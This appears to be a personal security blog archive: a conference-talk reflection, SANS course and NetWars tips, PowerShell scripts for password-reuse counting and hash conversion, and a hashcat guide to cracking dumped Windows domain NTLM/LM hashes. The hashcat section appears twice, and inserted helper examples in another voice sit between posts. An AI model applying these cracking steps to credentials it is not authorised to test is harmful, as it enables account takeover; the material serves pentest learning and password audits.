I just gave my first talk at Wild West Hackin' Fest. Thanks for letting me present. :)
My spouse pestered me to submit a paper. So I submitted a half-thought-out idea of telling how a stay-at-home mom ended up in info sec. I never expected in a million years that my topic would be chosen. I found out in June. I wanted to cancel, but before I could, my spouse took to Twitter and told everyone that I'd been accepted. So, I felt like I had to do this talk. I was scared, though, so I avoided writing anything like the plague. I had an idea of what I wanted to say - a direction I wanted to go in. I think that I failed in that respect. I told part of the story. I didn't say everything that I wanted to say.
If the talk belongs to me (I'm not sure of the etiquette surrounding talks, considering this was my first talk ever), I might record it as it's meant to be - when I'm not so nervous. I won't be on camera - it would just be my voice, and maybe slides. I requested that they not record it - they kindly obliged.
I'm slightly disappointed in myself, but also feel a little accomplished because I was brave enough to speak in front of people. I never thought I had it in me. I used to sing in front of crowds, but that's different because you're singing someone else's story - you're not expressing your own ideas. You also get swept away in the music - for me - it's like the room drops away and I'm just left with the music. Speaking on the other hand terrifies me. Weird, I know.
I see some women on Twitter noting why they are afraid to give talks - they're afraid that they won't have anything to say. To them - you probably have something much more important to talk about than being a mom who becomes an info sec pro. I talked about my kids during the talk for heaven's sake. Your journeys, experience, thoughts help people more than you realize. I've seen some of the incredible things that these young women have been up to, and don't understand why they can't see how awesome they are. My suggestion is - give it a shot - you might surprise yourself.
The people here at Wild West Hackin' Fest were so kind to me when the talk was over. They told me I did well - not sure I actually believe that they were sincere, but I didn't hear anything negative. Not saying no one said anything negative, but if they did, I didn't hear it. Submit your papers - be heard. Inspire other people.
Friday, October 26, 2018
Sunday, July 1, 2018
SANS SEC560
Went to training this past week. Took SANS SEC560.
Choose the hotel you stay at wisely. I didn't sleep very well all week. There's always the chance of not sleeping well, but in this case, it was worse than usual. I can't fault the hotel; the beds were comfortable, the rooms were clean, etc. There was just so much noise around, the whole night. I did not stay in the SANS venue this time.
The class itself was great. The instructor was entertaining. He went a little fast, but he had a lot of material to cover. As usual, I was trying to take notes while he spoke. I'm glad I have On-Demand so I can listen to the lecture again from someone else's perspective and pause it when I feel the instructor is going too fast.
Feel like I learned a bit this week. Most of the learning was from doing dumb things.
There is a CTF in it. I can't give away exact answers. Here are a few tips:
Pay attention to the instructor.
Get some sleep. I was not prepared for CTF day. I was so tired that I kept mistyping stuff. Simple stuff. I wasn't going into the right directory to run things.
Plan out the tools you will use wisely, and put them in the $PATH. This isn't always recommended for production machines, but in the case of VMs in a ctf, this may be a good idea.
Make notes of the tools you used throughout the week. This will not only help you remember what to use, but will also be a handy reference guide for when you're nervous during the ctf. This way, you don't have to flip through the course books. This is also good advice for taking the exam - indexing.
Choose your team wisely. I socially engineered my way into a good team. I took a gamble and I wore my SANS Netwars Tournament of Champions t-shirt and hoodie this week. The instructor made sure to announce that I was in last year's ToC, so people naturally assumed that I probably knew stuff. I was asked to join the team that I wanted. (After my performance yesterday, they are probably wondering how I won NetWars. I wasn't dishonest. It was persistence, Googling, and luck.)
That being said, don't wait for someone to ask you. You should have your team made by Day 4 at the latest.
Watch the people in class. The quiet ones who aren't paying attention are wild cards. They will either be extremely good, or they will be bad. I lucked out. The quiet person in our class was really good.
You want people with different skill sets in your team. I was doing scanning/recon, taking notes - making sure we had good material for a report, cracking passwords because I threw a couple of cores and more memory into my vm. If there was a tie, we'd have to explain how we did things, and sometimes that report is what sets you apart.
The other guys were methodically working on exploiting the machines. I would go in behind them and see if we missed anything. You can scan from each system's perspective. You might see something different from that perspective, because certain machines may be able to talk to each other, and nothing else.
I still ended up rooting a box, because I went in behind the first wave of exploiters in our team and got root on the box while they were trying to get into the next box. You don't always need root, but it's nice to have to be able to get the hashes and crack them.
Don't compete with your teammates. You're there to work as a team, not be the "star".
If you get stuck (this sounds stupid), try the dumbest things you can think of first and work your way up. Example: in tech support, it would be, "Is it powered on? Are the cables plugged in on both ends?", etc. In pen testing, it would be, "Is the username set to 'password' or other passwords you might already know? Do users have more privileges than they should?", etc. Good privilege escalation guides here: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation and here: https://www.fuzzysecurity.com/tutorials/16.html
Scan the network. Other teams may give clues about what to do next. They may be stuck in a spot that you already have and vice versa.
My team ended up winning, but just barely. I received a beautiful coin to add to my collection. Thus far, I have 2 504 coins, 1 560 coin, and a NetWars coin.
Monday, June 18, 2018
NetWars Tournament of Champions/Imposter Syndrome
Someone was asking for help on the Advisory Board regarding NetWars. I posted about NetWars before, but I didn't post anything about the Tournament of Champions. I found an article written by someone who'd gotten a coin at SANS Rocky Mountain. This person told me that I'm inspirational because I'd won that tournament at SANS Rocky Mountain.
I was avoiding this post because I'm not really proud of my performance at the tournament that I won at and ToC. Some people say that I should just be proud for attending ToC. I didn't feel like I had to do much to get the invite - like it was a lucky break. Don't misunderstand; I learned a lot from NetWars Core Tournament 4 and NetWars continuous, but I wouldn't consider myself a "champion".
People talk about imposter syndrome - some have said that they think that I have it because I have trouble accepting compliments or acknowledging my accomplishments. What if how I feel is real, though? What if people really do assume I know more than I really do? I'm not saying that I can't learn. I'm saying that I still have a lot to learn, and that's ok. Right now, I'm learning blue team stuff because I've been promoted to a Security Analyst position. I thought that I had a lot of stuff to learn before - I'm stacking more plates onto that pile.
Hope to attend NetWars Tournament again soon.
Tips for ToC:
Mr. Skoudis - at the special meeting beforehand - will say, "Work in teams." I didn't follow his advice - my goal was not to win. I wanted to learn. However, if you want to win - join a team. I didn't because I didn't want to weigh my team down. It was my first time playing Netwars Core Tournament 5. In fact, just do exactly what Skoudis says prior to the game.
Other than that, follow the advice for normal NetWars Core Tournament.
Go with the goal of having fun - not winning - and it will be much more enjoyable. I love all of the storyline in these tournaments - it keeps them interesting. Love the music.
Good luck.
Saturday, March 10, 2018
HackyEaster-Teaser
I didn't know about this challenge, but apparently it is released annually around Easter time. You may want to check it out. It's here:
https://hackyeaster.hacking-lab.com
I completed the teaser challenge several days ago. I'm looking forward to seeing what they come up with for the rest of the challenge.
Be patient with the creators. Apparently it can take some time for them to judge the answers so you can move on, and they are people that volunteer to do so. Thanks to those people that put time into judging the submissions. :)
Saturday, February 24, 2018
Count Number of Unique Passwords Powershell Hashtables
I'm on a password kick lately. I read about hash tables in Powershell. They are so cool. So, I wrote a script that counts the number of unique passwords in a text file that contains usernames and passwords. It also sorts the passwords from the most used to the least used, using the GetEnumerator method and Sort-Object. Keep in mind, everyone, that I'm still new to Powershell. Someone may have already done this, or there may be more efficient methods. This is what I've learned to this point in time.
#Make a hash table to hold the passwords and count.
$passwordscount = @{}
#Make a variable to hold each of the passwords
$password = $null
#Get the content of the passwords file and add it to a list
$passwordslist = Get-Content plain.txt
#Tell powershell the column number of the plain.txt file that you want in the hash table.
#The computer counts from 0, so it will be one less than the column you want.
#For example, plain.txt has a username and password separated by a colon.
#You want column 1. Column 0 is the username.
$passwordscolumnnumber = 1
#For each password in the passwords list, do the following
ForEach($password in $passwordslist){
    #Split each line of the plain.txt file into an array, splitting at the colon
    #The username is element 0, the password is element 1
    $passwordsarray = $password.split(':')
    #Skip blank or malformed lines; a missing password field would be a null key and crash the hash table lookup
    If ($passwordsarray.Count -le $passwordscolumnnumber){ continue }
    #separate these passwords from the username and count them
    $passwordfield = $passwordsarray[$passwordscolumnnumber]
    #If this is the first occurrence of a password, add it to the hash table and put 1 in the count
    If ($passwordscount[$passwordfield] -eq $null){
        $passwordscount[$passwordfield] = 1
    }
    Else{
        #if a password has already been seen, add 1 to its count
        $passwordscount[$passwordfield]++
    }
}
#Sort from the most used password to the least used (-Descending) and write the list out
$passwordscount.GetEnumerator() | Sort-Object -Property Value -Descending | Out-File passwordscount.txt
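Here is an added example, not the script from this post, that does the same counting as a reusable function. It splits on the first colon only (so a password that itself contains a colon survives), skips blank or malformed lines, and reports what share of accounts each of the top passwords covers, which is the number a defender actually wants from a reuse audit. The sample lines, the function name and its parameters are my own constructions.

```powershell
# Added example (not the blog author's script): count how many accounts share
# each password and report the share of accounts each top password covers.
function Get-PasswordReuse {
    param(
        [Parameter(Mandatory)] [string[]] $Lines,   # "username:password" lines
        [int] $Top = 5
    )
    $counts = @{}
    $total = 0
    foreach ($line in $Lines) {
        if ([string]::IsNullOrWhiteSpace($line)) { continue }
        # Split on the FIRST colon only, so a password containing ':' stays intact
        $parts = $line -split ':', 2
        if ($parts.Count -lt 2) { continue }     # malformed line: no password field
        $pw = $parts[1]
        $total++
        if ($counts.ContainsKey($pw)) { $counts[$pw]++ } else { $counts[$pw] = 1 }
    }
    $counts.GetEnumerator() |
        Sort-Object -Property Value -Descending |
        Select-Object -First $Top |
        ForEach-Object {
            [pscustomobject]@{
                Password = $_.Key
                Accounts = $_.Value
                Percent  = [math]::Round(100 * $_.Value / $total, 1)
            }
        }
}

# Constructed sample input (not real credentials)
$sample = @(
    'alice:Summer2018!'
    'bob:Summer2018!'
    'carol:P@ss:word'     # password that contains a colon
    'dave:Summer2018!'
    'erin:Welcome1'
    ''                    # blank line, skipped
    'frank:Welcome1'
)
Get-PasswordReuse -Lines $sample | Format-Table -AutoSize
```

With the constructed sample this reports Summer2018! on 3 of 6 accounts (50%), Welcome1 on 2 (33.3%) and P@ss:word on 1 (16.7%). Swap `$sample` for `Get-Content plain.txt` to run it against a real file.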
Thursday, February 22, 2018
Powershell: Convert JtR Formatted Text file to Hashcat LM or NTLM
I said on my recent post about cracking domain passwords with hashcat, that you could probably convert from JtR Format using Powershell. By JtR format, I mean username:uid:lm hash:ntlm hash on each line in a text file. Someone corrected me and stated that this is pwdump format. I learn new things every day. They also cleared up a misunderstanding about how the LM hashes work. Thanks again, loyal reader!
Update: Someone stated that there is a switch/flag so that JtR/pwdump formatted hashes could be used in hashcat. Does anyone happen to know what that switch/flag is? I haven't had luck finding it.
I think that I've written a script that may convert JtR formatted files to hashcat LM or NTLM.
#The following hash means that the lm hash is blank. This occurs when LM hashes are not
#stored (LM disabled) or the password is longer than 14 characters.
$blanklmhash = "aad3b435b51404eeaad3b435b51404ee"
#Create arrays to hold the lm hashes, ntlm hashes, and ntlm hashes with lm hashes.
$lmhashes = @()
$ntlmhashes = @()
$ntlmhasheswlm = @()
#Get the JtR formatted hashes from a text file.
$hasheslist = Get-Content hashes.txt
#For each JtR formatted hash in the hashes list, do the following
ForEach($JtRhash in $hasheslist){
    #Split the JtRhash into an array of four pieces. Element [0] of the array is the username.
    #Element[1] of the array is the uid. Element [2] of the array is the lm hash. Element [3] of
    #the array is the ntlm hash.
    $JtRhashArray = $JtRhash.split(':')
    #Skip blank or malformed lines that don't have all four fields
    If ($JtRhashArray.Count -lt 4){ continue }
    #if the LM hash is that blank hash in the hashes file, it means that LM is either disabled or
    #the password is greater than 14 characters. LM can't handle more than 14 characters. So, add
    #the LM hashes that are not that blank password to the $lmhashes array. Add their ntlm
    #counterparts to the ntlmhasheswlm array. I'm doing this because the lm cracked
    #passwords are uppercase because of how lm works. These lm hashes can be used as
    #a dictionary/rules attack against their ntlm counterparts - making it faster to crack the
    #ntlm passwords associated with them.
    #(-ne is case-insensitive in PowerShell, so an uppercase blank hash is matched too.)
    If ($JtRhashArray[2] -ne $blanklmhash){
        $lmhashes += $JtRhashArray[0] + ":" + $JtRhashArray[2]
        $ntlmhasheswlm += $JtRhashArray[0] + ":" + $JtRhashArray[3]
    }
    #otherwise, add the ntlm hash to the $ntlmhashes array.
    Else{
        $ntlmhashes += $JtRhashArray[0] + ":" + $JtRhashArray[3]
    }
}
#output the lm hashes, ntlm hashes, and ntlm hashes with lm hashes to files.
#Out-File in Windows PowerShell 5.1 writes UTF-16 by default, which hashcat can't parse, so force ASCII.
$lmhashes | Out-File lmhashes.txt -Encoding ascii
$ntlmhashes | Out-File ntlmhashes.txt -Encoding ascii
$ntlmhasheswlm | Out-File ntlmhasheswlm.txt -Encoding ascii
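As an added example (my own code, not the script above or any Metasploit/hashcat tool), here is the same pwdump-to-hashcat split written as functions, with two checks a defender wants before any cracking starts: it validates that both hash fields are 32 hex characters and drops lines that aren't, and it groups accounts by NTLM hash, because NTLM is unsalted and identical hashes mean identical passwords, visible without cracking anything. The sample lines and hex values are constructed placeholders, and the function and property names are my own.

```powershell
# Added example, not the blog author's script. Parses pwdump-style lines
# (user:uid:lmhash:ntlmhash:::) into hashcat-ready lists plus two audit facts.
$BlankLm = 'aad3b435b51404eeaad3b435b51404ee'   # LM field when no LM hash is stored

function ConvertFrom-PwdumpLine {
    param([string] $Line)
    $f = $Line -split ':'
    # Need at least user, uid, lm, ntlm; both hashes must be 32 hex characters
    if ($f.Count -lt 4) { return $null }
    if ($f[2] -notmatch '^[0-9a-fA-F]{32}$' -or $f[3] -notmatch '^[0-9a-fA-F]{32}$') { return $null }
    [pscustomobject]@{
        User = $f[0]
        Lm   = $f[2].ToLower()
        Ntlm = $f[3].ToLower()
    }
}

function Convert-PwdumpToHashcat {
    param([string[]] $Lines)
    $records = @($Lines | ForEach-Object { ConvertFrom-PwdumpLine $_ } | Where-Object { $_ })
    $withLm  = @($records | Where-Object { $_.Lm -ne $BlankLm })
    $noLm    = @($records | Where-Object { $_.Lm -eq $BlankLm })
    # NTLM is unsalted: identical hashes mean identical passwords, no cracking needed
    $reuse = @($records | Group-Object -Property Ntlm | Where-Object { $_.Count -gt 1 } |
               ForEach-Object {
                   [pscustomobject]@{ Ntlm = $_.Name; Users = @($_.Group | ForEach-Object User) }
               })
    [pscustomobject]@{
        LmHashes       = @($withLm | ForEach-Object { "$($_.User):$($_.Lm)" })    # hashcat -m 3000
        NtlmWithLm     = @($withLm | ForEach-Object { "$($_.User):$($_.Ntlm)" })  # hashcat -m 1000
        NtlmHashes     = @($noLm   | ForEach-Object { "$($_.User):$($_.Ntlm)" })  # hashcat -m 1000
        AccountsWithLm = $withLm.Count   # LM storage still enabled or password <= 14 chars
        ReusedNtlm     = $reuse
    }
}

# Constructed sample: the hex strings are placeholders, not real hashes
$sample = @(
    'alice:1001:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::'
    'bob:1002:22222222222222222222222222222222:33333333333333333333333333333333:::'
    'carol:1003:AAD3B435B51404EEAAD3B435B51404EE:11111111111111111111111111111111:::'
    'broken line without fields'
)
$r = Convert-PwdumpToHashcat -Lines $sample
# Windows PowerShell 5.1 writes UTF-16 by default, which hashcat cannot parse; force ASCII
$r.LmHashes   | Out-File lmhashes.txt      -Encoding ascii
$r.NtlmWithLm | Out-File ntlmhasheswlm.txt -Encoding ascii
$r.NtlmHashes | Out-File ntlmhashes.txt    -Encoding ascii
"Accounts with an LM hash stored: $($r.AccountsWithLm)"
$r.ReusedNtlm | ForEach-Object { "NTLM $($_.Ntlm) shared by: $($_.Users -join ', ')" }
```

On the constructed sample, bob is the only account with an LM hash, alice and carol are reported as sharing the same NTLM hash, and the malformed fourth line is silently dropped. The `-Encoding ascii` on each `Out-File` matters on Windows PowerShell 5.1, where the default is UTF-16 with a byte-order mark and hashcat rejects every line.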
Hashcat: Cracking Windows Domain Hashes
Learning how to use hashcat. Sharing some of my experience with it. I've used JtR and Cain and Abel. Hashcat I've used maybe once or twice. I'm not going to go into depth about how to dump the hashes. That is not the purpose of this post. If you're interested in that, Rapid7, the creator of Metasploit has some good tutorials about how to use their modules to dump password hashes from Domain Controllers.
First, I had to manipulate the data that I had gathered in order for hashcat to understand it. Many of the modules in Metasploit dump the hashes in JtR (John the Ripper) format. I've seen some that dump the hashes in hashcat format, but not a lot. Also, note, I may be missing some settings in Metasploit because I'm still new to using it. This still may be useful for other purposes.
For windows domain hashes, JtR format looks like the following:
username:uid:lm hash:ntlm hash
Note: There is a blank hash for lm hashes. That blank hash is aad3b435b51404eeaad3b435b51404ee. LM passwords are really easy to crack.
Someone was kind enough to explain the LM password being that blank hash. That means that the password is greater than 14 characters. Thanks loyal reader!
Sometimes it's useful to first crack LM passwords - if they are available, then crack the NTLM passwords using a dictionary consisting of the LM passwords and what are known as mangling rules in JtR.
The format that hashcat understands is "username:lm hash" or "username:ntlm hash". Note: this only works as long as the --username switch is given on the hashcat command line; otherwise, you'll get an error about the hash length.
I went about converting it the long way. There are much easier ways. I imagine I could use Powershell to remove the uid and one or the other of the password hash types. Or, I could have simply used officetohashcat.py.
Use CSV with HashCat (Use at your own risk. I haven't thoroughly tested this- it seems to work fine so far.)
I changed the List Separator in the Region settings in the Control Panel to use a : as a list separator instead of a comma. When I save files as csv files, it will be a colon separated list, not a comma separated list.
I used Microsoft Excel 2016 to separate the data for me. I like the sorting and filtering options with Excel. To bring in a delimited text file - in my case it was formatted with colons, you go to the Data tab>Get External Data>From Text File. Select the text file that contains the hashes from the list. Follow the directions in the wizard. On one part, it will ask you how it is delimited: Choose Other, then type :.
Once the data was imported into Excel, I sorted out the LM passwords. (I could tell that they were LM because they didn't have the blank LM hash. The hashes were different.) I deleted the uid and NTLM columns. I saved that into a lm_hashes.csv file.
Then I separated out the NTLM hashes. I deleted the uid and LM columns. I saved this as ntlm_hashes.csv file.
If either of these files are opened in Notepad, they should be colon delimited. Might check before trying to crack them.
Now the fun begins. :)
Hashcat takes some getting used to. It is picky about the order of things, attack mode, formats of the hashes, the type of attack, etc.
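Because hashcat is picky about its input, and the post above suggests checking the colon-delimited files in Notepad before cracking, here is an added example (my own code, not from the post) that does that check programmatically: it inspects the file's bytes for a UTF-16 or UTF-8 byte-order mark (the usual reason a file saved from PowerShell or Excel fails to load) and verifies that every non-empty line is user:hash with a 32-hex-character hash, which is what NTLM and LM lines look like when --username is used. The two demo files are constructed in the temp directory; the function name and parameters are my own.

```powershell
# Added example, not from the blog post: sanity-check a hash file before hashcat.
function Test-HashcatInput {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [int] $HashLength = 32          # NTLM and LM hashes are 32 hex characters
    )
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    $problems = [System.Collections.Generic.List[string]]::new()
    if ($bytes.Length -ge 2 -and $bytes[0] -eq 0xFF -and $bytes[1] -eq 0xFE) {
        $problems.Add('UTF-16 LE BOM: Out-File default in Windows PowerShell 5.1; rewrite with -Encoding ascii')
    } elseif ($bytes.Length -ge 3 -and $bytes[0] -eq 0xEF -and $bytes[1] -eq 0xBB -and $bytes[2] -eq 0xBF) {
        $problems.Add('UTF-8 BOM: three junk bytes are prepended to the first line')
    }
    $text = [System.Text.Encoding]::ASCII.GetString($bytes)
    $lineNo = 0
    foreach ($raw in ($text -split "`n")) {
        $lineNo++
        $line = $raw.TrimEnd("`r")      # hashcat tolerates CRLF, so just strip it
        if ($line -eq '') { continue }
        if ($line -notmatch "^[^:]+:[0-9a-fA-F]{$HashLength}$") {
            $problems.Add("line ${lineNo}: expected user:<$HashLength hex chars>, got '$line'")
        }
    }
    [pscustomobject]@{ Path = $Path; Ok = ($problems.Count -eq 0); Problems = $problems }
}

# Constructed demo: the same hashes written two ways (hex values are placeholders)
$dir   = [System.IO.Path]::GetTempPath()
$good  = Join-Path $dir 'ntlm_ok.txt'
$bad   = Join-Path $dir 'ntlm_bad.txt'
$lines = 'alice:11111111111111111111111111111111', 'bob:22222222222222222222222222222222'
[System.IO.File]::WriteAllText($good, ($lines -join "`n") + "`n", [System.Text.Encoding]::ASCII)
$lines + 'carol:not-a-hash' | Out-File $bad -Encoding unicode   # UTF-16 BOM plus a bad line
Test-HashcatInput $good | Format-List
Test-HashcatInput $bad  | Format-List
```

The first file comes back `Ok = True`; the second reports the UTF-16 byte-order mark and, because every line is decoded with NUL bytes between the characters, fails the layout check on each line as well, which is exactly how such a file looks to hashcat.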
Hashcat Dictionary attack
-a 0 : straight mode - this takes hashes from a dictionary
-m : the type of password hash. 1000 is NTLM, 3000 is LM, 900 is MD4
-o : an output file for the cracked hashes. If -o is not specified, the cracked hashes/passwords will be in hashcat.potfile. Note: if you want to save the hashes in a certain format, you can do that after cracking them with --show and other options.
Assuming hashcat is in the PATH. Otherwise, specify a full path.
hashcat64.exe -a 0 -m 1000 --username ntlm_hashes.csv dictionary.txt -o ntlm_cracked.txt
Note: You can specify more than one dictionary. Just add the pathname/file after the first one.
Hashcat Brute-Force (Mask Attack)
-a 3 : brute-force (mask) attack
-1 : user-defined character set. ?u - Uppercase letters, ?d - digits, ?s - symbols
--increment (-i) : don't just try the full length of the mask. Do 1 character, 2 characters, 3 characters, etc. with the same user-defined character set. If a mask is set that is large - like more than 6 characters, you may get an error about an integer overflow detected. This means that hashcat can't handle that mask. It may be wise not to use a large mask anyway - because those hashes may not be cracked in your lifetime. I always use increment. If it ever gets to a point where it estimates a long time - weeks or months to crack, I don't do it. There are better ways. Using rules to manipulate dictionary words, for instance.
hashcat64.exe -a 3 -m 1000 --username -1 ?u?d?s ntlm_hashes.csv -o ntlm_cracked.txt ?1?1?1?1?1?1?1 --increment
There is a -p option which specifies a different delimiter for the hash file/output file, but I've not had good luck with it. I recommend having your data the way it needs to be before putting it into hashcat.
Show Loot (IE the Cracked Passwords)
hashcat64.exe -m 1000 --username --show ntlm_hashes.csv
Note: That -m is the password type. It must match the type of hashes that were cracked, and --username is needed again because the file has usernames in it.
--show takes the original hash file and looks each hash up in the potfile. Cracked passwords land in hashcat.potfile whether or not you used an output file when you were cracking; if you did, they are also in that path/filename. The potfile is usually in the same place that the hashcat binary is stored, so remember to add --potfile-path with the path/filename if you aren't in the same directory as the hashcat.potfile.
Show the Cracked Hashes in a Certain Format
hashcat64.exe -m 1000 --show --potfile-path hashcat.potfile --username -o ntlm_cracked.txt --outfile-format 2 C:\Users\user\ntlm_hashes.csv
--potfile-path : specifies where the loot is.
--username : specifies to ignore usernames. This must be added if there are usernames in the original file.
-o : specifies an output file.
--outfile-format 2 : in this case, it shows the cracked hashes as plain text passwords in the file only. If the original file has users, it will have user:password in the output file.
C:\Users\user\ntlm_hashes.csv : specifies the original file that contains the hashes.
I will add how to do cracking with rules later. I haven't experimented with that functionality just yet.
First, I had to manipulate the data that I had gathered in order for hash cat to understand it. Many of the modules in Metasploit dump the hashes in JtR (John the Ripper) format. I've seen some that dump the hashes in hashcat format, but not a lot. Also, note, I may be missing some settings in Metasploit because I'm still new to using it. This still may be useful for other purposes.
For windows domain hashes, JtR format looks like the following:
username:uid:lm hash:ntlm hash
Note: There is a blank hash for lm hashes. That blank hash is aad3b435b51404eeaad3b435b51404ee. LM passwords are really easy to crack.
Someone was kind enough to explain the LM password being that blank hash. That means that the password is greater than 14 characters. Thanks loyal reader!
Sometimes it's useful to first crack LM passwords - if they are available, then crack the NTLM passwords using a dictionary consisting of the LM passwords and what are known as mangling rules in JtR.
The format that hashcat understands is "username:lm" hash or "username:ntlm" hash. Note: This is as long as the --username switch is being used in the command to use hashcat, other wise, you'll get an error about the hash length.
I went about converting it the long way. There are much easier ways. I imagine I could use Powershell to remove the uid and one or the other of the password hash types. Or, I could have simply used officetohashcat.py.
Use CSV with HashCat (Use at your own risk. I haven't thoroughly tested this- it seems to work fine so far.)
I changed the List Separator in the Region settings in the Control Panel to use a : as a list separator instead of a comma. When I save files as csv files, it will be a colon separated list, not a comma separated list.
I used Microsoft Excel 2016 to separate the data for me. I like the sorting and filtering options with Excel. To bring in a delimited text file - in my case it was formatted with colons, you go to the Data tab>Get External Data>From Text File. Select the text file that contains the hashes from the list. Follow the directions in the wizard. On one part, it will ask you how it is delimited: Choose Other, then type :.
One the data was imported into Excel, I sorted out the LM passwords. (I could tell that they were LM because they didn't have the blank LM hash. The hashes were different.) I deleted the uid and NTLM columns. I saved that into a lm_hashes.csv file.
Then I separated out the NTLM hashes. I deleted the uid and LM columns. I saved this as ntlm_hashes.csv file.
If either of these files are opened in Notepad, they should be colon delimited. Might check before trying to crack them.
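As an added example (not from the original post), here is a small Python script that does the same split the Excel steps above do: it reads pwdump-style username:rid:lm:ntlm::: lines, drops the blank LM hash, and writes username:hash files for hashcat's --username mode. The input format is an assumption and the sample hashes are constructed placeholders.

```python
"""Added example (not from the original post): split a pwdump-style hash dump
into the username:hash files that hashcat expects with --username.

Assumed input format, one account per line (secretsdump / pwdump style):
    username:rid:lm_hash:ntlm_hash:::
"""
from pathlib import Path

# LM hash of an empty password (quoted in the post). An account carrying it has
# no LM hash to crack (LM storage disabled or password longer than 14 chars).
BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample dump; these hash values are placeholders, not real accounts.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
legacyuser:1001:1a2b3c4d5e6f70811a2b3c4d5e6f7081:ffeeddccbbaa99887766554433221100:::
# lines that are not account records are skipped
this line is malformed
SVC_BACKUP:1105:AAD3B435B51404EEAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::
"""


def is_hex_hash(value: str) -> bool:
    """LM and NTLM hashes are both 16 bytes, i.e. exactly 32 hex characters."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value)


def split_dump(text: str):
    """Return (lm_lines, ntlm_lines, skipped).

    lm_lines  : username:lm_hash for accounts that still have a real LM hash
    ntlm_lines: username:ntlm_hash for every account
    skipped   : input lines that did not parse as hash records
    """
    lm_lines, ntlm_lines, skipped = [], [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            skipped.append(raw)
            continue
        user, lm, ntlm = fields[0], fields[2].lower(), fields[3].lower()
        if not (user and is_hex_hash(lm) and is_hex_hash(ntlm)):
            skipped.append(raw)
            continue
        if lm != BLANK_LM:  # blank LM hash: nothing to crack in LM mode (-m 3000)
            lm_lines.append(f"{user}:{lm}")
        ntlm_lines.append(f"{user}:{ntlm}")
    return lm_lines, ntlm_lines, skipped


def write_hashcat_files(text: str, out_dir: str = ".") -> dict:
    """Write ntlm_hashes.txt and (if any) lm_hashes.txt, colon separated,
    and return the record counts."""
    lm_lines, ntlm_lines, skipped = split_dump(text)
    out = Path(out_dir)
    out.mkdir(parents=True, exist_ok=True)
    (out / "ntlm_hashes.txt").write_text("\n".join(ntlm_lines) + "\n")
    if lm_lines:
        (out / "lm_hashes.txt").write_text("\n".join(lm_lines) + "\n")
    return {"lm": len(lm_lines), "ntlm": len(ntlm_lines), "skipped": len(skipped)}


if __name__ == "__main__":
    import sys

    src = Path(sys.argv[1]).read_text() if len(sys.argv) > 1 else SAMPLE_DUMP
    print(write_hashcat_files(src))
    # hashcat then takes these files with --username, e.g.:
    #   hashcat64.exe -a 0 -m 3000 --username lm_hashes.txt dictionary.txt
    #   hashcat64.exe -a 0 -m 1000 --username ntlm_hashes.txt dictionary.txt
```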
Now the fun begins. :)
Hashcat takes some getting used to. It is picky about the order of things, attack mode, formats of the hashes, the type of attack, etc.
Hashcat Dictionary attack
-a 0 : straight mode - this takes candidate passwords from a dictionary (wordlist), hashes each one and compares it against the hashes in the file.
-m : the type of password hash. 1000 is NTLM, 3000 is LM, 900 is MD4
-o : an output file for the cracked hashes. If -o is not specified, the cracked hashes/passwords will be in hashcat.potfile. Note: if you want to save the hashes in a certain format, you can do that after cracking them with --show and other options.
Assuming hashcat is in the PATH. Otherwise, specify a full path.
hashcat64.exe -a 0 -m 1000 ntlm_hashes.csv dictionary.txt -o ntlm_cracked.txt
Note: You can specify more than one dictionary. Just add the pathname/file after the first one.
Hashcat Brute-Force (Mask Attack)
-a 3 : brute-force (mask) attack
-1 : user-defined character set. ?u - Uppercase letters, ?d - digits, ?s - symbols
--increment (-i) : don't just try the full length of the mask. Try 1 character, 2 characters, 3 characters, etc. with the same user-defined character set. If a mask is set that is large - like more than 6 characters, you may get an error about an integer overflow detected. This means that hashcat can't handle that mask. It may be wise not to use a large mask anyway - because those hashes may not be cracked in your lifetime. I always use incremental. If it ever gets to a point where it estimates a long time - weeks or months to crack, I don't do it. There are better ways. Using rules to manipulate dictionary words, for instance.
hashcat64.exe -a 3 -m 1000 -1 ?u?d?s ntlm_hashes.csv -o ntlm_cracked.txt ?1?1?1?1?1?1?1 --increment
There is a -p option which specifies a different delimiter for the hash file/output file, but I've not had good luck with it. I recommend having your data the way it needs to be before putting it into hashcat.
Show Loot (i.e. the Cracked Passwords)
hashcat64.exe -m 1000 --show hashcat.potfile
Note: That -m is the password type. It must match the type of hashes that were cracked.
That last bit, hashcat.potfile is assuming you didn't add an output file when you were cracking. If you did, they will be in that path/filename. I think that it still saves it to the pot file as well, but remember to add the path/filename if you aren't in the same directory as the hashcat.potfile. It's usually in the same place that the hashcat binary is stored.
Show the Cracked Hashes in a Certain Format
hashcat64.exe -m 1000 --show --potfile-path hashcat.potfile --username -o ntlm_cracked.txt --outfile-format 2 C:\Users\user\ntlm_hashes.csv
--potfile-path : specifies where the loot is.
--username : tells hashcat that each line starts with a username field, which it ignores when matching hashes. This must be added if there are usernames in the original file.
-o : specifies an output file.
--outfile-format 2 : in this case, it shows the cracked hashes as plain text passwords in the file only. If the original file has users, it will have user:password in the output file.
C:\Users\user\ntlm_hashes.csv : specifies the original file that contains the hashes.
I will add how to do cracking with rules later. I haven't experimented with that functionality just yet.
Thursday, February 15, 2018
K For Troubleshooting
People think of Kibana as this awesome data visualization and exploration tool. What does that even mean? Considering the breadth of logs that can be fed into Kibana, that can mean many things.
Today, I'm going to explore a real use that may not be normally considered. Troubleshooting.
Fortigate VPN tunnels, for example, have fairly explicit error logs. If you aren't used to reading them, they can be annoying to understand. For example, "vpn SA peer proposal does not match local policy" - in other words, "Hey, your firewall rules may be blocking this traffic." At least some are easily understood, like "probable preshared key mismatch", for example.
If you have these logs going into the ELK stack, you can use Kibana to find these errors for you, so all you would have to do is look at a Visualization or Dashboard when you arrive at work and periodically throughout the day - fix the VPNs before anyone even knows there is a problem and have an awesome day - not having to fight those fires when some random person mentions them.
In order to show only the down VPNs, on the Discover page, I showed only the firewall logs, and did a search for "probable preshared key mismatch". I saved that search.
When I created the visualization, I chose the option to create the visualization from a saved search, and selected the "Probable Preshared Key Mismatch" saved search.
